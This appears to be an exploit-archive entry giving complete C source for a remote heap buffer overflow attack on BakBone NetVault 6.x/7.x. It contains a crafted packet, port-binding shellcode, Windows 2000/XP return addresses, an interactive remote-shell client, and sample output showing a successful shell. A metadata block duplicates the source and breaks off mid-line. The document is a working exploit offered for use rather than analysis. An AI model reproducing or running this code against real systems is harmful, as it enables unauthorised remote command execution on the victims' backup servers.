ID 1337DAY-ID-8567 Type zdt Reporter nolimit Modified 2005-05-17T00:00:00
Description
Exploit for unknown platform in category remote exploits
====================================================
BakBone NetVault 6.x/7.x Remote Heap Buffer Overflow
====================================================
/* Bakbone Netvault heap overflow exploit.
Software Hole discovered by BuzzDee
POC written by nolimit and BuzzDee.
As class101 has already shown, this application has a lot of holes.
This is another remote heap overflow. This was tested on the demo version
of netvault. We considered mailing the vendor on this one, but figured we'd recieve
the same response class did, which was none. So perhaps a second critical vulnerabilty
will wake Bakbone up to their software faults.
A note to skiddies about this exploit
This won't really net you a lot of elite b0xes because class101's isn't patched,
so it's just as vulnerable as this. Not to mention the fact that not many businesses
use this software anyway.
..Maybe it's because of all the holes??
Thx to Flare, AceHigh, Shift,class101, and of course BuzzDee.
Sorry.. everyone wants to be famous :)
C:\CODING\c++\netvault\Release>netvault 1 2KVM
[*] Target: 2KVM Port: 20031
Targetting 2K..
[*] Socket initialized...
[*] Sending buffer.
[*] Sleeping..............
[*] Connecting again to trigger overflow..
[*] Connecting to host: 2KVM on port 101
[*] Exploit worked! dropping into shell
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\Program Files\BakBone Software\NetVault>
[email protected]
*/
#include <stdio.h>
#include <string.h>
#include <io.h>
#include <winsock.h>
#pragma comment(lib,"ws2_32")
void cmdshell (int sock);
long gimmeip(char *hostname);
char buffer[40000];
//initial request to host
char packet[]=
"\x00\x00\x02\x01\x00\x00\x00\x8F\xD0\xF0\xCA\x0B\x00\x00\x00\x69"
"\x3B\x62\x3B\x6F\x3B\x6F\x3B\x7A\x3B\x00\x11\x57\x3C\x42\x00\x01"
"\xB9\xF9\xA2\xC8\x00\x00\x00\x00\x03\x00\x00\x00\x00\x01\xA5\x97"
"\xF0\xCA\x05\x00\x00\x00\x6E\x33\x32\x3B\x00\x20\x00\x00\x00\x10"
"\x02\x4E\x3F\xAC\x14\xCC\x0A\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01"
"\xA5\x97\xF0\xCA\x05\x00\x00\x00\x6E\x33\x32\x3B\x00\x20\x00\x00"
"\x00\x10\x02\x4E\x3F\xC0\xA8\xEA\xEB\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x01\xA5\x97\xF0\xCA\x05\x00\x00\x00\x6E\x33\x32\x3B\x00\x20"
"\x00\x00\x00\x10\x02\x4E\x3F\xC2\x97\x2C\xD3\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\xB9\xF9\xA2\xC8\x02\x02\x00\x00\x00\xA5\x97\xF0\xCA"
"\x05\x00\x00\x00\x6E\x33\x32\x3B\x00\x20\x00\x00\x00\x04\x02\x4E"
"\x3F\xAC\x14\xCC\x0A\xB0\xFC\xE2\x00\x00\x00\x00\x00\xEC\xFA\x8E"
"\x01\xA4\x6B\x41\x00\xE4\xFA\x8E\x01\xFF\xFF\xFF\xFF\x01\x02";
//class101 modified shellcode from metasploit.com. yummy.
char shellcode[]=
"\x33\xC9\x83\xE9\xAF\xD9\xEE\xD9\x74\x24\xF4\x5B\x81\x73\x13\xBB"
"\x1E\xD3\x6A\x83\xEB\xFC\xE2\xF4\x47\x74\x38\x25\x53\xE7\x2C\x95"
"\x44\x7E\x58\x06\x9F\x3A\x58\x2F\x87\x95\xAF\x6F\xC3\x1F\x3C\xE1"
"\xF4\x06\x58\x35\x9B\x1F\x38\x89\x8B\x57\x58\x5E\x30\x1F\x3D\x5B"
"\x7B\x87\x7F\xEE\x7B\x6A\xD4\xAB\x71\x13\xD2\xA8\x50\xEA\xE8\x3E"
"\x9F\x36\xA6\x89\x30\x41\xF7\x6B\x50\x78\x58\x66\xF0\x95\x8C\x76"
"\xBA\xF5\xD0\x46\x30\x97\xBF\x4E\xA7\x7F\x10\x5B\x7B\x7A\x58\x2A"
"\x8B\x95\x93\x66\x30\x6E\xCF\xC7\x30\x5E\xDB\x34\xD3\x90\x9D\x64"
"\x57\x4E\x2C\xBC\x8A\xC5\xB5\x39\xDD\x76\xE0\x58\xD3\x69\xA0\x58"
"\xE4\x4A\x2C\xBA\xD3\xD5\x3E\x96\x80\x4E\x2C\xBC\xE4\x97\x36\x0C"
"\x3A\xF3\xDB\x68\xEE\x74\xD1\x95\x6B\x76\x0A\x63\x4E\xB3\x84\x95"
"\x6D\x4D\x80\x39\xE8\x4D\x90\x39\xF8\x4D\x2C\xBA\xDD\x76\xD3\x0F"
"\xDD\x4D\x5A\x8B\x2E\x76\x77\x70\xCB\xD9\x84\x95\x6D\x74\xC3\x3B"
"\xEE\xE1\x03\x02\x1F\xB3\xFD\x83\xEC\xE1\x05\x39\xEE\xE1\x03\x02"
"\x5E\x57\x55\x23\xEC\xE1\x05\x3A\xEF\x4A\x86\x95\x6B\x8D\xBB\x8D"
"\xC2\xD8\xAA\x3D\x44\xC8\x86\x95\x6B\x78\xB9\x0E\xDD\x76\xB0\x07"
"\x32\xFB\xB9\x3A\xE2\x37\x1F\xE3\x5C\x74\x97\xE3\x59\x2F\x13\x99"
"\x11\xE0\x91\x47\x45\x5C\xFF\xF9\x36\x64\xEB\xC1\x10\xB5\xBB\x18"
"\x45\xAD\xC5\x95\xCE\x5A\x2C\xBC\xE0\x49\x81\x3B\xEA\x4F\xB9\x6B"
"\xEA\x4F\x86\x3B\x44\xCE\xBB\xC7\x62\x1B\x1D\x39\x44\xC8\xB9\x95"
"\x44\x29\x2C\xBA\x30\x49\x2F\xE9\x7F\x7A\x2C\xBC\xE9\xE1\x03\x02"
"\x54\xD0\x33\x0A\xE8\xE1\x05\x95\x6B\x1E\xD3\x6A";
char jmpToXP[]="\xBD\x9B\x36\x7C"; //XP SP1
char uefOverWriteXP[]="\xB4\x73\xED\x77";//XP SP1
char jmpTo2K[]="\x7E\x6D\x03\x75"; //2k SP4
char uefOverWrite2K[]="\x4C\x14\x54\x7C"; //2K SP4
int main(int argc,char *argv[])
{
WSADATA wsaData;
struct sockaddr_in targetTCP;
int sockTCP,s;
unsigned short port = 20031;
long ip;
if(argc < 3)
{
printf("Bakbone Netvault Remote Heap Overflow.\n"
"Usage: %s [Target] [address] <port>\n"
" eg: netvault.exe 1 127.0.0.1\n"
"Targets\n1. Windows 2000\n2. Windows XP SP0-1\n"
"Coded by [email protected] and BuzzDee.\n",argv[0]);
return 1;
}
if(argc==4)
port = atoi(argv[3]);
WSAStartup(0x0202, &wsaData);
printf("[*] Target:\t%s \tPort: %d\n\n",argv[2],port);
ip=gimmeip(argv[2]);
targetTCP.sin_family = AF_INET;
targetTCP.sin_addr.s_addr = ip;
targetTCP.sin_port = htons(port);
memset(buffer,'\x90',40000);
memcpy(buffer,packet,sizeof(packet)-1); //request packet
memcpy(buffer+32790,"\xEB\x0C",2); //JMP ahead over the 2 overwrites
switch(atoi(argv[1]))
{
case 1:
printf("Targetting 2K..\n");
memcpy(buffer+32792,jmpTo2K,sizeof(jmpTo2K)-1); //overwrite pointer to CALL [EDI+74]
memcpy(buffer+32796,uefOverWrite2K,sizeof(uefOverWrite2K)-1); //UEF as chosen.
break;
case 2:
printf("Targetting XP..\n");
memcpy(buffer+32792,jmpToXP,sizeof(jmpToXP)-1); //overwrite pointer to CALL [EDI+74]
memcpy(buffer+32796,uefOverWriteXP,sizeof(uefOverWriteXP)-1); //UEF as chosen.
break;
default:
printf("Error target not found.\n");
return 1;
break;
}
memcpy(buffer+32820,shellcode,sizeof(shellcode)-1); //101 portbind thx class101/metasploit ;p
memcpy(buffer+39947,"\x00\x00\x00",3); //all done! only 39950 bytes! ;P
if ((sockTCP = socket(AF_INET, SOCK_STREAM, 0)) == -1)
{
printf("[x] Socket not initialized! Exiting...\n");
WSACleanup();
return 1;
}
printf("[*] Socket initialized...\n");
if(connect(sockTCP,(struct sockaddr *)&targetTCP, sizeof(targetTCP)) != 0)
{
printf("[*] Connection to host failed! Exiting...\n");
WSACleanup();
exit(1);
}
printf("[*] Sending buffer.\n");
Sleep(1000);
if (send(sockTCP, buffer, 39950,0) == -1)
{
printf("[x] Failed to inject packet! Exiting...\n");
WSACleanup();
return 1;
}
printf("[*] Sleeping.");
for(s=0;s<8;s++)
{ //wait for it to catch
printf(".");
Sleep(500);
}
closesocket(sockTCP);
for(s=0;s<5;s++)
{
printf(".");
Sleep(500);
} //exploit triggers when you reconnect sometimes
printf("\n[*] Connecting again to trigger overflow..\n");
if ((sockTCP = socket(AF_INET, SOCK_STREAM, 0)) == -1)
{
printf("[x] Socket not initialized! Exiting...\n");
WSACleanup();
return 1;
}
if(connect(sockTCP,(struct sockaddr *)&targetTCP, sizeof(targetTCP)) != 0)
{
printf("[*] Connection to host failed! Exiting...\n");
WSACleanup();
exit(1);
}
Sleep(500);
closesocket(sockTCP);
printf("[*] Connecting to host: %s on port 101\n",argv[2]);
if ((sockTCP = socket(AF_INET, SOCK_STREAM, 0)) == -1)
{
printf("[x] Socket not initialized! Exiting...\n");
WSACleanup();
return 1;
}
targetTCP.sin_port= htons(101);
if(connect(sockTCP,(struct sockaddr *)&targetTCP, sizeof(targetTCP)) != 0)
{
printf("[*] Connection to host failed! Exiting...\n");
WSACleanup();
exit(1);
}
printf("[*] Exploit worked! dropping into shell\n");
cmdshell(sockTCP);
WSACleanup();
exit(1);
return 0;
}
/*
Taken from some random exploit.
good, simple cmdshell function.
*/
void cmdshell (int sock)
{
struct timeval tv;
int length;
unsigned long o[2];
char buffer[1000];
tv.tv_sec = 1;
tv.tv_usec = 0;
while (1)
{
o[0] = 1;
o[1] = sock;
length = select (0, (fd_set *)&o, NULL, NULL, &tv);
if(length == 1)
{
length = recv (sock, buffer, sizeof (buffer), 0);
if (length <= 0)
{
printf ("[x] Connection closed.\n");
WSACleanup();
return;
}
length = write (1, buffer, length);
if (length <= 0)
{
printf ("[x] Connection closed.\n");
WSACleanup();
return;
}
}
else
{
length = read (0, buffer, sizeof (buffer));
if (length <= 0)
{
printf("[x] Connection closed.\n");
WSACleanup();
return;
}
length = send(sock, buffer, length, 0);
if (length <= 0)
{
printf("[x] Connection closed.\n");
WSACleanup();
return;
}
}
}
}
/*********************************************************************************/
long gimmeip(char *hostname)
{
struct hostent *he;
long ipaddr;
if ((ipaddr = inet_addr(hostname)) < 0)
{
if ((he = gethostbyname(hostname)) == NULL)
{
printf("[x] Failed to resolve host: %s! Exiting...\n\n",hostname);
WSACleanup();
exit(1);
}
memcpy(&ipaddr, he->h_addr, he->h_length);
}
return ipaddr;
}
/*********************************************************************************/
# 0day.today [2018-01-01] #
{"hash": "7f4b48622c43f14e680822cab25df87e0e46d36c510b12b09619c8efe790296a", "id": "1337DAY-ID-8567", "lastseen": "2018-01-01T15:06:31", "viewCount": 1, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "37e5d5b6ac3ce6fb6d3a6ab0f49b2bf0", "key": "description"}, {"hash": "f92c789b904b8323a2b79a3f89d90aaf", "key": "href"}, {"hash": "eabf37e08cca7c35ae6ce382d4d4431d", "key": "modified"}, {"hash": "eabf37e08cca7c35ae6ce382d4d4431d", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "75491edad9c72286347796c5bc5a3be3", "key": "reporter"}, {"hash": "51a353f49730a66b5838b068963a2dff", "key": "sourceData"}, {"hash": "1cf6161fcb5f5a106ee1773dfa55d522", "key": "sourceHref"}, {"hash": "5cc91cef95aed0d10c276a87300e434e", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 1.7, "vector": "NONE", "modified": "2018-01-01T15:06:31"}, "dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:1361412562310814180", "OPENVAS:1361412562310814345", "OPENVAS:1361412562310814342"]}, {"type": "kaspersky", "idList": ["KLA11353", "KLA11100"]}, {"type": "nessus", "idList": ["SMB_NT_MS18_NOV_4465664.NASL"]}, {"type": "zdt", "idList": ["1337DAY-ID-20031"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:11735", "SECURITYVULNS:VULN:4776"]}], "modified": "2018-01-01T15:06:31"}, "vulnersScore": 1.7}, "type": "zdt", "sourceHref": "https://0day.today/exploit/8567", "description": "Exploit for unknown platform in category remote exploits", "title": "BakBone NetVault 6.x/7.x Remote Heap Buffer Overflow", "history": [{"bulletin": {"hash": "1785135769c93c62319293b5971e59bdfcb179f2f35769fe01c67a1d0528ead7", "id": "1337DAY-ID-8567", "lastseen": "2016-04-20T01:21:24", "enchantments": {"score": {"value": 9.0, "modified": "2016-04-20T01:21:24"}}, "hashmap": [{"hash": "6698ba32197628b61f7f5e32c8f48b5f", "key": "sourceHref"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "a7158ad4800c326bf219ded8aaf076ea", "key": "sourceData"}, {"hash": "37e5d5b6ac3ce6fb6d3a6ab0f49b2bf0", "key": "description"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "78e81454822894e6973e045b7f362632", "key": "href"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "5cc91cef95aed0d10c276a87300e434e", "key": "title"}, {"hash": "eabf37e08cca7c35ae6ce382d4d4431d", "key": "modified"}, {"hash": "eabf37e08cca7c35ae6ce382d4d4431d", "key": "published"}, {"hash": "75491edad9c72286347796c5bc5a3be3", "key": "reporter"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/8567", "description": "Exploit for unknown platform in category remote exploits", "viewCount": 0, "title": "BakBone NetVault 6.x/7.x Remote Heap Buffer Overflow", "cvss": {"score": 0.0, "vector": "NONE"}, "objectVersion": "1.0", "cvelist": [], "sourceData": "====================================================\r\nBakBone NetVault 6.x/7.x Remote Heap Buffer Overflow\r\n====================================================\r\n\r\n/* Bakbone Netvault heap overflow exploit. \r\nSoftware Hole discovered by BuzzDee\r\nPOC written by nolimit and BuzzDee.\r\n\r\nAs class101 has already shown, this application has a lot of holes. \r\nThis is another remote heap overflow. This was tested on the demo version\r\nof netvault. We considered mailing the vendor on this one, but figured we'd recieve\r\nthe same response class did, which was none. So perhaps a second critical vulnerabilty\r\nwill wake Bakbone up to their software faults. \r\n\r\nA note to skiddies about this exploit\r\nThis won't really net you a lot of elite b0xes because class101's isn't patched,\r\n so it's just as vulnerable as this. Not to mention the fact that not many businesses\r\n use this software anyway.\r\n ..Maybe it's because of all the holes??\r\n\r\nThx to Flare, AceHigh, Shift,class101, and of course BuzzDee.\r\nSorry.. everyone wants to be famous :)\r\n\r\n\r\n C:\\CODING\\c++\\netvault\\Release>netvault 1 2KVM\r\n[*] Target: 2KVM Port: 20031\r\n\r\nTargetting 2K..\r\n[*] Socket initialized...\r\n[*] Sending buffer.\r\n[*] Sleeping..............\r\n[*] Connecting again to trigger overflow..\r\n[*] Connecting to host: 2KVM on port 101\r\n[*] Exploit worked! dropping into shell\r\nMicrosoft Windows 2000 [Version 5.00.2195]\r\n(C) Copyright 1985-2000 Microsoft Corp.\r\n\r\nC:\\Program Files\\BakBone Software\\NetVault>\r\n-nolimit@COREiSO\r\n*/\r\n#include <stdio.h>\r\n#include <string.h>\r\n#include <io.h>\r\n#include <winsock.h>\r\n#pragma comment(lib,\"ws2_32\")\r\n\r\nvoid cmdshell (int sock);\r\nlong gimmeip(char *hostname);\r\nchar buffer[40000];\r\n//initial request to host\r\nchar packet[]=\r\n\"\\x00\\x00\\x02\\x01\\x00\\x00\\x00\\x8F\\xD0\\xF0\\xCA\\x0B\\x00\\x00\\x00\\x69\"\r\n\"\\x3B\\x62\\x3B\\x6F\\x3B\\x6F\\x3B\\x7A\\x3B\\x00\\x11\\x57\\x3C\\x42\\x00\\x01\"\r\n\"\\xB9\\xF9\\xA2\\xC8\\x00\\x00\\x00\\x00\\x03\\x00\\x00\\x00\\x00\\x01\\xA5\\x97\"\r\n\"\\xF0\\xCA\\x05\\x00\\x00\\x00\\x6E\\x33\\x32\\x3B\\x00\\x20\\x00\\x00\\x00\\x10\"\r\n\"\\x02\\x4E\\x3F\\xAC\\x14\\xCC\\x0A\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\"\r\n\"\\xA5\\x97\\xF0\\xCA\\x05\\x00\\x00\\x00\\x6E\\x33\\x32\\x3B\\x00\\x20\\x00\\x00\"\r\n\"\\x00\\x10\\x02\\x4E\\x3F\\xC0\\xA8\\xEA\\xEB\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\"\\x00\\x01\\xA5\\x97\\xF0\\xCA\\x05\\x00\\x00\\x00\\x6E\\x33\\x32\\x3B\\x00\\x20\"\r\n\"\\x00\\x00\\x00\\x10\\x02\\x4E\\x3F\\xC2\\x97\\x2C\\xD3\\x00\\x00\\x00\\x00\\x00\"\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\"\\x00\\x00\\x00\\xB9\\xF9\\xA2\\xC8\\x02\\x02\\x00\\x00\\x00\\xA5\\x97\\xF0\\xCA\"\r\n\"\\x05\\x00\\x00\\x00\\x6E\\x33\\x32\\x3B\\x00\\x20\\x00\\x00\\x00\\x04\\x02\\x4E\"\r\n\"\\x3F\\xAC\\x14\\xCC\\x0A\\xB0\\xFC\\xE2\\x00\\x00\\x00\\x00\\x00\\xEC\\xFA\\x8E\"\r\n\"\\x01\\xA4\\x6B\\x41\\x00\\xE4\\xFA\\x8E\\x01\\xFF\\xFF\\xFF\\xFF\\x01\\x02\";\r\n//class101 modified shellcode from metasploit.com. yummy.\r\nchar shellcode[]=\r\n\t\"\\x33\\xC9\\x83\\xE9\\xAF\\xD9\\xEE\\xD9\\x74\\x24\\xF4\\x5B\\x81\\x73\\x13\\xBB\"\r\n\t\"\\x1E\\xD3\\x6A\\x83\\xEB\\xFC\\xE2\\xF4\\x47\\x74\\x38\\x25\\x53\\xE7\\x2C\\x95\"\r\n\t\"\\x44\\x7E\\x58\\x06\\x9F\\x3A\\x58\\x2F\\x87\\x95\\xAF\\x6F\\xC3\\x1F\\x3C\\xE1\"\r\n\t\"\\xF4\\x06\\x58\\x35\\x9B\\x1F\\x38\\x89\\x8B\\x57\\x58\\x5E\\x30\\x1F\\x3D\\x5B\"\r\n\t\"\\x7B\\x87\\x7F\\xEE\\x7B\\x6A\\xD4\\xAB\\x71\\x13\\xD2\\xA8\\x50\\xEA\\xE8\\x3E\"\r\n\t\"\\x9F\\x36\\xA6\\x89\\x30\\x41\\xF7\\x6B\\x50\\x78\\x58\\x66\\xF0\\x95\\x8C\\x76\"\r\n\t\"\\xBA\\xF5\\xD0\\x46\\x30\\x97\\xBF\\x4E\\xA7\\x7F\\x10\\x5B\\x7B\\x7A\\x58\\x2A\"\r\n\t\"\\x8B\\x95\\x93\\x66\\x30\\x6E\\xCF\\xC7\\x30\\x5E\\xDB\\x34\\xD3\\x90\\x9D\\x64\"\r\n\t\"\\x57\\x4E\\x2C\\xBC\\x8A\\xC5\\xB5\\x39\\xDD\\x76\\xE0\\x58\\xD3\\x69\\xA0\\x58\"\r\n\t\"\\xE4\\x4A\\x2C\\xBA\\xD3\\xD5\\x3E\\x96\\x80\\x4E\\x2C\\xBC\\xE4\\x97\\x36\\x0C\"\r\n\t\"\\x3A\\xF3\\xDB\\x68\\xEE\\x74\\xD1\\x95\\x6B\\x76\\x0A\\x63\\x4E\\xB3\\x84\\x95\"\r\n\t\"\\x6D\\x4D\\x80\\x39\\xE8\\x4D\\x90\\x39\\xF8\\x4D\\x2C\\xBA\\xDD\\x76\\xD3\\x0F\"\r\n\t\"\\xDD\\x4D\\x5A\\x8B\\x2E\\x76\\x77\\x70\\xCB\\xD9\\x84\\x95\\x6D\\x74\\xC3\\x3B\"\r\n\t\"\\xEE\\xE1\\x03\\x02\\x1F\\xB3\\xFD\\x83\\xEC\\xE1\\x05\\x39\\xEE\\xE1\\x03\\x02\"\r\n\t\"\\x5E\\x57\\x55\\x23\\xEC\\xE1\\x05\\x3A\\xEF\\x4A\\x86\\x95\\x6B\\x8D\\xBB\\x8D\"\r\n\t\"\\xC2\\xD8\\xAA\\x3D\\x44\\xC8\\x86\\x95\\x6B\\x78\\xB9\\x0E\\xDD\\x76\\xB0\\x07\"\r\n\t\"\\x32\\xFB\\xB9\\x3A\\xE2\\x37\\x1F\\xE3\\x5C\\x74\\x97\\xE3\\x59\\x2F\\x13\\x99\"\r\n\t\"\\x11\\xE0\\x91\\x47\\x45\\x5C\\xFF\\xF9\\x36\\x64\\xEB\\xC1\\x10\\xB5\\xBB\\x18\"\r\n\t\"\\x45\\xAD\\xC5\\x95\\xCE\\x5A\\x2C\\xBC\\xE0\\x49\\x81\\x3B\\xEA\\x4F\\xB9\\x6B\"\r\n\t\"\\xEA\\x4F\\x86\\x3B\\x44\\xCE\\xBB\\xC7\\x62\\x1B\\x1D\\x39\\x44\\xC8\\xB9\\x95\"\r\n\t\"\\x44\\x29\\x2C\\xBA\\x30\\x49\\x2F\\xE9\\x7F\\x7A\\x2C\\xBC\\xE9\\xE1\\x03\\x02\" \r\n\t\"\\x54\\xD0\\x33\\x0A\\xE8\\xE1\\x05\\x95\\x6B\\x1E\\xD3\\x6A\";\r\n\r\nchar jmpToXP[]=\"\\xBD\\x9B\\x36\\x7C\"; //XP SP1\r\nchar uefOverWriteXP[]=\"\\xB4\\x73\\xED\\x77\";//XP SP1\r\nchar jmpTo2K[]=\"\\x7E\\x6D\\x03\\x75\"; //2k SP4\r\nchar uefOverWrite2K[]=\"\\x4C\\x14\\x54\\x7C\"; //2K SP4\r\n\r\nint main(int argc,char *argv[])\r\n{ \r\n\t\tWSADATA wsaData;\r\n\t\tstruct sockaddr_in targetTCP;\r\n\t\tint sockTCP,s;\r\n\t\tunsigned short port = 20031;\r\n\t\tlong ip;\r\n\t\tif(argc < 3)\r\n\t\t{\r\n\t\t\t\r\n\t\t\tprintf(\"Bakbone Netvault Remote Heap Overflow.\\n\"\r\n\t\t\t\t\"Usage: %s [Target] [address] <port>\\n\"\r\n\t\t\t\t\" eg: netvault.exe 1 127.0.0.1\\n\"\r\n\t\t\t\t\"Targets\\n1. Windows 2000\\n2. Windows XP SP0-1\\n\"\r\n\t\t\t\t\t\"Coded by nolimit@CiSO and BuzzDee.\\n\",argv[0]);\r\n\t\t\treturn 1;\t\t\t\r\n\t\t}\t\t\r\n\t\tif(argc==4)\r\n\t\t\tport = atoi(argv[3]);\t\t\t\t\t\r\n WSAStartup(0x0202, &wsaData);\t\t\t\t\r\n\t\tprintf(\"[*] Target:\\t%s \\tPort: %d\\n\\n\",argv[2],port);\r\n\t\tip=gimmeip(argv[2]);\t\r\n targetTCP.sin_family = AF_INET;\r\n targetTCP.sin_addr.s_addr = ip;\r\n targetTCP.sin_port = htons(port);\r\n\t\tmemset(buffer,'\\x90',40000);\r\n\t\tmemcpy(buffer,packet,sizeof(packet)-1); //request packet\r\n\t\tmemcpy(buffer+32790,\"\\xEB\\x0C\",2); //JMP ahead over the 2 overwrites\r\n\t\tswitch(atoi(argv[1]))\r\n\t\t{\r\n\t\t\tcase 1:\r\n\t\t\tprintf(\"Targetting 2K..\\n\");\r\n\t\t\tmemcpy(buffer+32792,jmpTo2K,sizeof(jmpTo2K)-1); //overwrite pointer to CALL [EDI+74]\r\n\t\t\tmemcpy(buffer+32796,uefOverWrite2K,sizeof(uefOverWrite2K)-1); //UEF as chosen.\r\n\t\t\tbreak;\r\n\t\t\tcase 2:\r\n\t\t\tprintf(\"Targetting XP..\\n\");\r\n\t\t\tmemcpy(buffer+32792,jmpToXP,sizeof(jmpToXP)-1); //overwrite pointer to CALL [EDI+74]\r\n\t\t\tmemcpy(buffer+32796,uefOverWriteXP,sizeof(uefOverWriteXP)-1); //UEF as chosen.\r\n\t\t\tbreak;\r\n\t\t\tdefault:\r\n\t\t\tprintf(\"Error target not found.\\n\");\r\n\t\t\treturn 1;\r\n\t\t\tbreak;\r\n\t\t}\r\n\t\tmemcpy(buffer+32820,shellcode,sizeof(shellcode)-1); //101 portbind thx class101/metasploit ;p\r\n\t\tmemcpy(buffer+39947,\"\\x00\\x00\\x00\",3); //all done! only 39950 bytes! ;P\r\n\t\tif ((sockTCP = socket(AF_INET, SOCK_STREAM, 0)) == -1)\r\n\t\t{\r\n\t\t\t\tprintf(\"[x] Socket not initialized! Exiting...\\n\");\r\n\t\t\t\tWSACleanup();\r\n return 1;\r\n\t\t}\r\n\t\tprintf(\"[*] Socket initialized...\\n\");\t\t\t\t\t\r\n\t\tif(connect(sockTCP,(struct sockaddr *)&targetTCP, sizeof(targetTCP)) != 0)\r\n\t\t{\r\n\t\t\tprintf(\"[*] Connection to host failed! Exiting...\\n\");\r\n\t\t\tWSACleanup();\r\n\t\t\texit(1);\r\n\t\t} \t\t\r\n\t\tprintf(\"[*] Sending buffer.\\n\");\r\n\t\tSleep(1000);\r\n\t\tif (send(sockTCP, buffer, 39950,0) == -1)\r\n\t\t{\r\n\t\t\t\tprintf(\"[x] Failed to inject packet! Exiting...\\n\");\r\n\t\t\t\tWSACleanup();\r\n return 1;\r\n\t\t}\t\t\r\n\t\tprintf(\"[*] Sleeping.\");\r\n\t\tfor(s=0;s<8;s++)\r\n\t\t{ //wait for it to catch\r\n\t\t\tprintf(\".\");\r\n\t\t\tSleep(500);\r\n\t\t}\r\n\t\tclosesocket(sockTCP);\r\n\t\tfor(s=0;s<5;s++)\r\n\t\t{\r\n\t\t\tprintf(\".\");\r\n\t\t\tSleep(500);\r\n\t\t} //exploit triggers when you reconnect sometimes\r\n\t\tprintf(\"\\n[*] Connecting again to trigger overflow..\\n\");\r\n\t\tif ((sockTCP = socket(AF_INET, SOCK_STREAM, 0)) == -1)\r\n\t\t{ \r\n\t\t\t\tprintf(\"[x] Socket not initialized! Exiting...\\n\");\r\n\t\t\t\tWSACleanup();\r\n return 1;\r\n\t\t}\r\n\t\tif(connect(sockTCP,(struct sockaddr *)&targetTCP, sizeof(targetTCP)) != 0)\r\n\t\t{\r\n\t\t\tprintf(\"[*] Connection to host failed! Exiting...\\n\");\r\n\t\t\tWSACleanup();\r\n\t\t\texit(1);\r\n\t\t} \t\t\r\n\t\tSleep(500);\r\n\t\tclosesocket(sockTCP);\r\n\t\t\t\t\r\n\t\tprintf(\"[*] Connecting to host: %s on port 101\\n\",argv[2]);\r\n\t\tif ((sockTCP = socket(AF_INET, SOCK_STREAM, 0)) == -1)\r\n\t\t{\r\n\t\t\t\tprintf(\"[x] Socket not initialized! Exiting...\\n\");\r\n\t\t\t\tWSACleanup();\r\n return 1;\r\n\t\t}\r\n\t\ttargetTCP.sin_port= htons(101);\r\n\t\tif(connect(sockTCP,(struct sockaddr *)&targetTCP, sizeof(targetTCP)) != 0)\r\n\t\t{\r\n\t\t\tprintf(\"[*] Connection to host failed! Exiting...\\n\");\r\n\t\t\tWSACleanup();\r\n\t\t\texit(1);\r\n\t\t} \t\t\r\n\t\tprintf(\"[*] Exploit worked! dropping into shell\\n\");\r\n\t\tcmdshell(sockTCP);\r\n\t\tWSACleanup();\r\n\t\texit(1);\r\n\t\treturn 0;\r\n}\r\n/*\r\nTaken from some random exploit.\r\ngood, simple cmdshell function.\r\n*/\r\nvoid cmdshell (int sock)\r\n{\r\n struct timeval tv;\r\n int length;\r\n unsigned long o[2];\r\n char buffer[1000];\r\n \r\n tv.tv_sec = 1;\r\n tv.tv_usec = 0;\r\n\r\n while (1) \r\n {\r\n\to[0] = 1;\r\n\to[1] = sock;\t\r\n\r\n\tlength = select (0, (fd_set *)&o, NULL, NULL, &tv);\r\n\tif(length == 1)\r\n\t{\r\n\t\tlength = recv (sock, buffer, sizeof (buffer), 0);\r\n\t\tif (length <= 0) \r\n\t\t{\r\n\t\t\tprintf (\"[x] Connection closed.\\n\");\r\n\t\t\tWSACleanup();\r\n\t\t\treturn;\r\n\t\t}\r\n\t\tlength = write (1, buffer, length);\r\n\t\tif (length <= 0) \r\n\t\t{\r\n\t\t\tprintf (\"[x] Connection closed.\\n\");\r\n\t\t\tWSACleanup();\r\n\t\t\treturn;\r\n\t\t}\r\n\t}\r\n\telse\r\n\t{\r\n \tlength = read (0, buffer, sizeof (buffer));\r\n\t\tif (length <= 0) \r\n\t\t{\r\n\t\t\tprintf(\"[x] Connection closed.\\n\");\r\n\t\t\tWSACleanup();\r\n\t\t\treturn;\r\n\t\t}\r\n\t\tlength = send(sock, buffer, length, 0);\r\n\t\tif (length <= 0) \r\n\t\t{\r\n\t\t\tprintf(\"[x] Connection 